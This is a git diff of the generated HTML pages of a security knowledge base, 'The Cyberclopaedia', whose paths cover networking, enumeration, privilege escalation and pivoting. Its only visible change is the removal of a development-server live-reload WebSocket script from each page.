The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Association Frames.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Association Frames.html index fef1cf89..5f029f7c 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Association Frames.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Association Frames.html @@ -100,7 +100,7 @@ @@ -265,22 +265,6 @@

Dis - - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Authentication Frames.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Authentication Frames.html index 6bdf9292..44ed20d0 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Authentication Frames.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Authentication Frames.html @@ -100,7 +100,7 @@ @@ -201,22 +201,6 @@

- - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Discovery Frames.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Discovery Frames.html index 069e3b74..802a9e82 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Discovery Frames.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Discovery Frames.html @@ -100,7 +100,7 @@ @@ -312,22 +312,6 @@

Pro - - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/index.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/index.html index db5e5b9c..8f58652b 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/index.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/index.html @@ -100,7 +100,7 @@ @@ -360,22 +360,6 @@

Quiet

- - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/WiFi Protected Access (WPA).html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/WiFi Protected Access (WPA).html index 77ac0fdb..f0ceae69 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/WiFi Protected Access (WPA).html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/WiFi Protected Access (WPA).html @@ -100,7 +100,7 @@ @@ -183,22 +183,6 @@

Introduction - - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/index.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/index.html index 277168f4..82422d80 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/index.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/index.html @@ -100,7 +100,7 @@ @@ -257,22 +257,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Networking/Protocols/index.html b/docs/Networking/Protocols/index.html index d39bc0b2..0348b269 100644 --- a/docs/Networking/Protocols/index.html +++ b/docs/Networking/Protocols/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

Introduction - - diff --git a/docs/Networking/Subnetting.html b/docs/Networking/Subnetting.html index c4dee201..61f0c5de 100644 --- a/docs/Networking/Subnetting.html +++ b/docs/Networking/Subnetting.html @@ -100,7 +100,7 @@ @@ -187,22 +187,6 @@

Introduction - - diff --git a/docs/Networking/The TCP-IP Suite and the OSI Model/(1) The Physical Layer.html b/docs/Networking/The TCP-IP Suite and the OSI Model/(1) The Physical Layer.html index 43db3352..c283c07b 100644 --- a/docs/Networking/The TCP-IP Suite and the OSI Model/(1) The Physical Layer.html +++ b/docs/Networking/The TCP-IP Suite and the OSI Model/(1) The Physical Layer.html @@ -100,7 +100,7 @@ @@ -274,22 +274,6 @@

Outdoor Bridge< - - diff --git a/docs/Networking/The TCP-IP Suite and the OSI Model/(2) The Datalink Layer.html b/docs/Networking/The TCP-IP Suite and the OSI Model/(2) The Datalink Layer.html index 0d0f5090..0d3a943a 100644 --- a/docs/Networking/The TCP-IP Suite and the OSI Model/(2) The Datalink Layer.html +++ b/docs/Networking/The TCP-IP Suite and the OSI Model/(2) The Datalink Layer.html @@ -100,7 +100,7 @@ @@ -181,22 +181,6 @@

MAC Addresses - - diff --git a/docs/Networking/The TCP-IP Suite and the OSI Model/index.html b/docs/Networking/The TCP-IP Suite and the OSI Model/index.html index b79e8a95..fa06d77f 100644 --- a/docs/Networking/The TCP-IP Suite and the OSI Model/index.html +++ b/docs/Networking/The TCP-IP Suite and the OSI Model/index.html @@ -100,7 +100,7 @@ @@ -197,22 +197,6 @@

The TCP/IP Su - - diff --git a/docs/Networking/VLANs.html b/docs/Networking/VLANs.html index 3fe404a2..e40cc0df 100644 --- a/docs/Networking/VLANs.html +++ b/docs/Networking/VLANs.html @@ -100,7 +100,7 @@ @@ -202,22 +202,6 @@

Native VLAN

- - diff --git a/docs/Networking/index.html b/docs/Networking/index.html index a22daa50..e6e19d25 100644 --- a/docs/Networking/index.html +++ b/docs/Networking/index.html @@ -100,7 +100,7 @@ @@ -176,22 +176,6 @@

Networking

- - diff --git a/docs/Post Exploitation/Active Directory (AD)/Domain Data Enumeration with Bloodhound.html b/docs/Post Exploitation/Active Directory (AD)/Domain Data Enumeration with Bloodhound.html index b47deab0..ff6d4d72 100644 --- a/docs/Post Exploitation/Active Directory (AD)/Domain Data Enumeration with Bloodhound.html +++ b/docs/Post Exploitation/Active Directory (AD)/Domain Data Enumeration with Bloodhound.html @@ -100,7 +100,7 @@ @@ -220,22 +220,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html b/docs/Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html index 2d51c93c..05a0157b 100644 --- a/docs/Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html +++ b/docs/Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html @@ -100,7 +100,7 @@ @@ -228,22 +228,6 @@

Add - - diff --git a/docs/Post Exploitation/Active Directory (AD)/index.html b/docs/Post Exploitation/Active Directory (AD)/index.html index adf5cac8..843a72f0 100644 --- a/docs/Post Exploitation/Active Directory (AD)/index.html +++ b/docs/Post Exploitation/Active Directory (AD)/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

Activ - - diff --git a/docs/Post Exploitation/Enumeration/Linux/Hunting Down Sensitive Files.html b/docs/Post Exploitation/Enumeration/Linux/Hunting Down Sensitive Files.html index 831cc86c..851885d8 100644 --- a/docs/Post Exploitation/Enumeration/Linux/Hunting Down Sensitive Files.html +++ b/docs/Post Exploitation/Enumeration/Linux/Hunting Down Sensitive Files.html @@ -100,7 +100,7 @@ @@ -187,22 +187,6 @@

Finding SSH - - diff --git a/docs/Post Exploitation/Enumeration/Linux/Network Enumeration.html b/docs/Post Exploitation/Enumeration/Linux/Network Enumeration.html index 8c82914f..3bd12bba 100644 --- a/docs/Post Exploitation/Enumeration/Linux/Network Enumeration.html +++ b/docs/Post Exploitation/Enumeration/Linux/Network Enumeration.html @@ -100,7 +100,7 @@ @@ -187,22 +187,6 @@

List Open Por - - diff --git a/docs/Post Exploitation/Enumeration/Linux/System Enumeration.html b/docs/Post Exploitation/Enumeration/Linux/System Enumeration.html index 9eaa7560..8f1b78dc 100644 --- a/docs/Post Exploitation/Enumeration/Linux/System Enumeration.html +++ b/docs/Post Exploitation/Enumeration/Linux/System Enumeration.html @@ -100,7 +100,7 @@ @@ -210,22 +210,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Enumeration/Linux/User Enumeration.html b/docs/Post Exploitation/Enumeration/Linux/User Enumeration.html index a28a9e67..734de9c1 100644 --- a/docs/Post Exploitation/Enumeration/Linux/User Enumeration.html +++ b/docs/Post Exploitation/Enumeration/Linux/User Enumeration.html @@ -100,7 +100,7 @@ @@ -193,22 +193,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Enumeration/Linux/index.html b/docs/Post Exploitation/Enumeration/Linux/index.html index 658f8521..7f7a12ef 100644 --- a/docs/Post Exploitation/Enumeration/Linux/index.html +++ b/docs/Post Exploitation/Enumeration/Linux/index.html @@ -100,7 +100,7 @@ @@ -218,22 +218,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Enumeration/Windows/System Enumeration.html b/docs/Post Exploitation/Enumeration/Windows/System Enumeration.html index ffd2724a..111d4b89 100644 --- a/docs/Post Exploitation/Enumeration/Windows/System Enumeration.html +++ b/docs/Post Exploitation/Enumeration/Windows/System Enumeration.html @@ -100,7 +100,7 @@ @@ -186,22 +186,6 @@

Enumerate D - - diff --git a/docs/Post Exploitation/Enumeration/Windows/index.html b/docs/Post Exploitation/Enumeration/Windows/index.html index b446a960..fe8342de 100644 --- a/docs/Post Exploitation/Enumeration/Windows/index.html +++ b/docs/Post Exploitation/Enumeration/Windows/index.html @@ -100,7 +100,7 @@ @@ -181,22 +181,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Enumeration/index.html b/docs/Post Exploitation/Enumeration/index.html index a59b4fa4..e7ef8807 100644 --- a/docs/Post Exploitation/Enumeration/index.html +++ b/docs/Post Exploitation/Enumeration/index.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Post Exploitation/Pivoting/SSH Tunneling.html b/docs/Post Exploitation/Pivoting/SSH Tunneling.html index deec28d8..30c1c35c 100644 --- a/docs/Post Exploitation/Pivoting/SSH Tunneling.html +++ b/docs/Post Exploitation/Pivoting/SSH Tunneling.html @@ -100,7 +100,7 @@ @@ -207,22 +207,6 @@

- - diff --git a/docs/Post Exploitation/Pivoting/Tunneling with Chisel.html b/docs/Post Exploitation/Pivoting/Tunneling with Chisel.html index 0ec02d44..b5f869fe 100644 --- a/docs/Post Exploitation/Pivoting/Tunneling with Chisel.html +++ b/docs/Post Exploitation/Pivoting/Tunneling with Chisel.html @@ -100,7 +100,7 @@ @@ -196,22 +196,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Pivoting/index.html b/docs/Post Exploitation/Pivoting/index.html index 69bfba08..15cf5bbb 100644 --- a/docs/Post Exploitation/Pivoting/index.html +++ b/docs/Post Exploitation/Pivoting/index.html @@ -100,7 +100,7 @@ @@ -176,22 +176,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Linux/Abusing Linux Capabilities.html b/docs/Post Exploitation/Privilege Escalation/Linux/Abusing Linux Capabilities.html index 7105c1e1..8caa8469 100644 --- a/docs/Post Exploitation/Privilege Escalation/Linux/Abusing Linux Capabilities.html +++ b/docs/Post Exploitation/Privilege Escalation/Linux/Abusing Linux Capabilities.html @@ -100,7 +100,7 @@ @@ -183,22 +183,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Linux/Abusing SUID & SGID Binaries.html b/docs/Post Exploitation/Privilege Escalation/Linux/Abusing SUID & SGID Binaries.html index eb39af5a..4bf7010c 100644 --- a/docs/Post Exploitation/Privilege Escalation/Linux/Abusing SUID & SGID Binaries.html +++ b/docs/Post Exploitation/Privilege Escalation/Linux/Abusing SUID & SGID Binaries.html @@ -100,7 +100,7 @@ @@ -260,22 +260,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Privilege Escalation/Linux/Kernel Exploits.html b/docs/Post Exploitation/Privilege Escalation/Linux/Kernel Exploits.html index 91dbf32a..7de5c43c 100644 --- a/docs/Post Exploitation/Privilege Escalation/Linux/Kernel Exploits.html +++ b/docs/Post Exploitation/Privilege Escalation/Linux/Kernel Exploits.html @@ -100,7 +100,7 @@ @@ -186,22 +186,6 @@

E - - diff --git a/docs/Post Exploitation/Privilege Escalation/Linux/NFS Root Squashing.html b/docs/Post Exploitation/Privilege Escalation/Linux/NFS Root Squashing.html index 2e626d36..70741b24 100644 --- a/docs/Post Exploitation/Privilege Escalation/Linux/NFS Root Squashing.html +++ b/docs/Post Exploitation/Privilege Escalation/Linux/NFS Root Squashing.html @@ -100,7 +100,7 @@ @@ -213,22 +213,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Escalation via LD_PRELOAD.html b/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Escalation via LD_PRELOAD.html index 6f6195e3..1447ea6d 100644 --- a/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Escalation via LD_PRELOAD.html +++ b/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Escalation via LD_PRELOAD.html @@ -100,7 +100,7 @@ @@ -204,22 +204,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Shell Escape Sequences.html b/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Shell Escape Sequences.html index 8c769974..f196dc45 100644 --- a/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Shell Escape Sequences.html +++ b/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Shell Escape Sequences.html @@ -100,7 +100,7 @@ @@ -186,22 +186,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Linux/index.html b/docs/Post Exploitation/Privilege Escalation/Linux/index.html index f78e8aa9..44b34079 100644 --- a/docs/Post Exploitation/Privilege Escalation/Linux/index.html +++ b/docs/Post Exploitation/Privilege Escalation/Linux/index.html @@ -100,7 +100,7 @@ @@ -217,22 +217,6 @@

Methodology

- - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/AlwaysInstallElevated Group Policy.html b/docs/Post Exploitation/Privilege Escalation/Windows/AlwaysInstallElevated Group Policy.html index 34f2b246..8628ac58 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/AlwaysInstallElevated Group Policy.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/AlwaysInstallElevated Group Policy.html @@ -100,7 +100,7 @@ @@ -189,22 +189,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/AutoRun Programmes.html b/docs/Post Exploitation/Privilege Escalation/Windows/AutoRun Programmes.html index d04c6a93..b36e925f 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/AutoRun Programmes.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/AutoRun Programmes.html @@ -100,7 +100,7 @@ @@ -185,22 +185,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Bypassing UAC.html b/docs/Post Exploitation/Privilege Escalation/Windows/Bypassing UAC.html index 98cb680b..165e2dbe 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Bypassing UAC.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Bypassing UAC.html @@ -100,7 +100,7 @@ @@ -189,22 +189,6 @@

Bypassing UAC - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Kernel Exploits.html b/docs/Post Exploitation/Privilege Escalation/Windows/Kernel Exploits.html index 3d8d49dc..190cf504 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Kernel Exploits.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Kernel Exploits.html @@ -100,7 +100,7 @@ @@ -178,22 +178,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Executable Permissions.html b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Executable Permissions.html index a129c60e..a1f61d8b 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Executable Permissions.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Executable Permissions.html @@ -100,7 +100,7 @@ @@ -181,22 +181,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Permissions.html b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Permissions.html index b24b5f8a..52a1f7ca 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Permissions.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Permissions.html @@ -100,7 +100,7 @@ @@ -192,22 +192,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Unquoted Service Paths.html b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Unquoted Service Paths.html index e4a39b57..d7f58927 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Unquoted Service Paths.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Unquoted Service Paths.html @@ -100,7 +100,7 @@ @@ -198,22 +198,6 @@

- - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Weak Registry Permissions.html b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Weak Registry Permissions.html index d243546d..08d3f484 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Weak Registry Permissions.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Weak Registry Permissions.html @@ -100,7 +100,7 @@ @@ -187,22 +187,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/index.html b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/index.html index 6a5686ea..eb6b4329 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/index.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/index.html @@ -100,7 +100,7 @@ @@ -193,22 +193,6 @@

Enumeration

- - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Scheduled Tasks.html b/docs/Post Exploitation/Privilege Escalation/Windows/Scheduled Tasks.html index 3453c4a9..6dcc5e99 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Scheduled Tasks.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Scheduled Tasks.html @@ -100,7 +100,7 @@ @@ -185,22 +185,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Startup Applications.html b/docs/Post Exploitation/Privilege Escalation/Windows/Startup Applications.html index c3bf3af6..e9c68a2a 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Startup Applications.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Startup Applications.html @@ -100,7 +100,7 @@ @@ -182,22 +182,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Stored Credentials.html b/docs/Post Exploitation/Privilege Escalation/Windows/Stored Credentials.html index 44fbc990..5052d879 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Stored Credentials.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Stored Credentials.html @@ -100,7 +100,7 @@ @@ -184,22 +184,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Token Impersonation.html b/docs/Post Exploitation/Privilege Escalation/Windows/Token Impersonation.html index 8b0321e2..7a0773af 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Token Impersonation.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Token Impersonation.html @@ -100,7 +100,7 @@ @@ -178,22 +178,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/index.html b/docs/Post Exploitation/Privilege Escalation/Windows/index.html index 48842195..d57b344e 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/index.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/index.html @@ -100,7 +100,7 @@ @@ -211,22 +211,6 @@

Methodology

- - diff --git a/docs/Post Exploitation/Privilege Escalation/index.html b/docs/Post Exploitation/Privilege Escalation/index.html index 16f961c4..c4de1e4e 100644 --- a/docs/Post Exploitation/Privilege Escalation/index.html +++ b/docs/Post Exploitation/Privilege Escalation/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

Introduction - - diff --git a/docs/Post Exploitation/index.html b/docs/Post Exploitation/index.html index 3a44b990..33037c8c 100644 --- a/docs/Post Exploitation/index.html +++ b/docs/Post Exploitation/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

Post Expl - - diff --git a/docs/Reconnaissance/Enumeration/DNS Server Enumeration (53).html b/docs/Reconnaissance/Enumeration/DNS Server Enumeration (53).html index 62aa79ed..2b201914 100644 --- a/docs/Reconnaissance/Enumeration/DNS Server Enumeration (53).html +++ b/docs/Reconnaissance/Enumeration/DNS Server Enumeration (53).html @@ -100,7 +100,7 @@ @@ -248,22 +248,6 @@

DNS Zone - - diff --git a/docs/Reconnaissance/Enumeration/FTP Enumeration (21).html b/docs/Reconnaissance/Enumeration/FTP Enumeration (21).html index 8a7524bb..bf539588 100644 --- a/docs/Reconnaissance/Enumeration/FTP Enumeration (21).html +++ b/docs/Reconnaissance/Enumeration/FTP Enumeration (21).html @@ -100,7 +100,7 @@ @@ -183,22 +183,6 @@

Introduction - - diff --git a/docs/Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html b/docs/Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html index 5ab786b6..1169f625 100644 --- a/docs/Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html +++ b/docs/Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html @@ -100,7 +100,7 @@ @@ -202,22 +202,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html b/docs/Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html index 701436e7..52d1ab42 100644 --- a/docs/Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html +++ b/docs/Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html @@ -100,7 +100,7 @@ @@ -188,22 +188,6 @@

Xmas Scan

- - diff --git a/docs/Reconnaissance/Enumeration/Port Scanning/SYN Scan.html b/docs/Reconnaissance/Enumeration/Port Scanning/SYN Scan.html index c2c9c833..ac38dd85 100644 --- a/docs/Reconnaissance/Enumeration/Port Scanning/SYN Scan.html +++ b/docs/Reconnaissance/Enumeration/Port Scanning/SYN Scan.html @@ -100,7 +100,7 @@ @@ -188,22 +188,6 @@

SYN Scan

- - diff --git a/docs/Reconnaissance/Enumeration/Port Scanning/TCP Connect Scan.html b/docs/Reconnaissance/Enumeration/Port Scanning/TCP Connect Scan.html index 70aca4b9..78ac3b36 100644 --- a/docs/Reconnaissance/Enumeration/Port Scanning/TCP Connect Scan.html +++ b/docs/Reconnaissance/Enumeration/Port Scanning/TCP Connect Scan.html @@ -100,7 +100,7 @@ @@ -179,22 +179,6 @@

TCP Connect - - diff --git a/docs/Reconnaissance/Enumeration/Port Scanning/index.html b/docs/Reconnaissance/Enumeration/Port Scanning/index.html index 17625689..60f2d67f 100644 --- a/docs/Reconnaissance/Enumeration/Port Scanning/index.html +++ b/docs/Reconnaissance/Enumeration/Port Scanning/index.html @@ -100,7 +100,7 @@ @@ -234,22 +234,6 @@

Port States

- - diff --git a/docs/Reconnaissance/Enumeration/SNMP Enumeration (161).html b/docs/Reconnaissance/Enumeration/SNMP Enumeration (161).html index 10cf0399..2c986095 100644 --- a/docs/Reconnaissance/Enumeration/SNMP Enumeration (161).html +++ b/docs/Reconnaissance/Enumeration/SNMP Enumeration (161).html @@ -100,7 +100,7 @@ @@ -195,22 +195,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Reconnaissance/Enumeration/Web Server Enumeration (80, 443).html b/docs/Reconnaissance/Enumeration/Web Server Enumeration (80, 443).html index b63fb9fd..2f027e3a 100644 --- a/docs/Reconnaissance/Enumeration/Web Server Enumeration (80, 443).html +++ b/docs/Reconnaissance/Enumeration/Web Server Enumeration (80, 443).html @@ -100,7 +100,7 @@ @@ -211,22 +211,6 @@

D - - diff --git a/docs/Reconnaissance/Enumeration/index.html b/docs/Reconnaissance/Enumeration/index.html index 608cc14d..a22b06b0 100644 --- a/docs/Reconnaissance/Enumeration/index.html +++ b/docs/Reconnaissance/Enumeration/index.html @@ -100,7 +100,7 @@ @@ -183,22 +183,6 @@

- - diff --git a/docs/Reconnaissance/OSINT/Domain Name Enumeration.html b/docs/Reconnaissance/OSINT/Domain Name Enumeration.html index c7e9c18e..3e491455 100644 --- a/docs/Reconnaissance/OSINT/Domain Name Enumeration.html +++ b/docs/Reconnaissance/OSINT/Domain Name Enumeration.html @@ -100,7 +100,7 @@ @@ -309,22 +309,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Reconnaissance/OSINT/Google Dorks.html b/docs/Reconnaissance/OSINT/Google Dorks.html index afe54f74..e8691b2f 100644 --- a/docs/Reconnaissance/OSINT/Google Dorks.html +++ b/docs/Reconnaissance/OSINT/Google Dorks.html @@ -100,7 +100,7 @@ @@ -209,22 +209,6 @@

Common oper - - diff --git a/docs/Reconnaissance/OSINT/Harvesting E-Mails.html b/docs/Reconnaissance/OSINT/Harvesting E-Mails.html index b8442d30..1e533fb6 100644 --- a/docs/Reconnaissance/OSINT/Harvesting E-Mails.html +++ b/docs/Reconnaissance/OSINT/Harvesting E-Mails.html @@ -100,7 +100,7 @@ @@ -218,22 +218,6 @@

Other tools

- - diff --git a/docs/Reconnaissance/OSINT/Instagram User Enumeration.html b/docs/Reconnaissance/OSINT/Instagram User Enumeration.html index 7d713ad7..81d69ba6 100644 --- a/docs/Reconnaissance/OSINT/Instagram User Enumeration.html +++ b/docs/Reconnaissance/OSINT/Instagram User Enumeration.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

